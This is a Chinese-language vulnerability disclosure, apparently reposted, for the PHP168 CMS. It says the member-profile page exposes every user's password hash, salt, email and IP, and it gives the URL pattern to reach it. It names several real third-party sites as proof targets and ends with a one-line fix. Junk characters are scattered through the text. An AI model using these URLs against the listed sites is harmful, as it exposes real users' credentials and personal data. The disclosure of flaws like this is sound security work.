简要描述: 国微PHP168中出现了一处神奇的array,可致全站用户数据泄露。泄露的内容包括全站用户的密码密文、邮箱、密码salt、IP等敏感信息。 详细说明:PHP168程序内置“用户”模块包含用户个人资料展示页面。在很多实际场景中,这个页面不会在前台使用,但可直接通过URL进行访问。页面路由为:/homepage.php/[用户名]/member-profile% R, m& |3 B- v/ Q- R
% M/ ?3 Q5 j& A, F7 h# H以PHP168官方演示站点为例,查看任意用户信息的页面链接为:
* g; Q% t& S% d& { w4 Q2 r' q$ Z- h6 ?1 t1 `3 w, W- S
http://php168.cn/com/homepage.php/admin/member-profile% l- k; M: G) h' e! Z" m! _
" Y: T. u* k! {1 w
由于该模块代码中出现了一句神奇的array,导致用户数据表内所有数据被当作数组取出直接显示出来。- \, @# V9 H& a4 C% V
http://www.myhack58.com/Article/UploadPic/2013-9/2013920918425520.jpg L2 {& {6 J4 Z+ h: m8 a
* u* o9 `$ V7 \! J, Y; ^9 p 漏洞证明:该漏洞影响使用该CMS系统的站点,以PHP168官网上的客户案例为例:. o. I$ h1 w# p# }- Z
. i V. V+ w, E
http://www.zjfzol.com.cn/homepage.php/admin/member-profile
. R; R+ e. W$ E e4 H, c$ q" h& \* h2 G) A8 L* M
http://www.scswl.cn/homepage.php/admin/member-profile
y M% P! N4 P% E
/ L6 F G# ?, P5 _http://www.tunet.edu.cn/homepage.php/admin/member-profile
L" g6 ~# l# k" {9 C2 y Y9 r4 Y+ ^3 B! U* O
http://www.itlead.com.cn/homepage.php/admin/member-profile2 p" c8 H4 R3 M/ H' z3 ], J
. H6 s% p/ t7 F* J/ i1 d Ohttp://www.aedp.cn/homepage.php/admin/member-profile
6 \$ s X3 H1 V7 W- A! |) N
! X, X/ w- t5 j# \4 s/ nhttp://www.qianlongnews.com/homepage.php/test/member-profile
" S+ g- I0 A# J
2 D8 Q# n+ i" v: ^" Mhttp://ny.zlxk.com/gov/homepage.php/admin/member-profile 修复方案:去掉输出 [/td][/tr]3 G. d5 s# G$ ?' ?( t9 H, m
[/table] |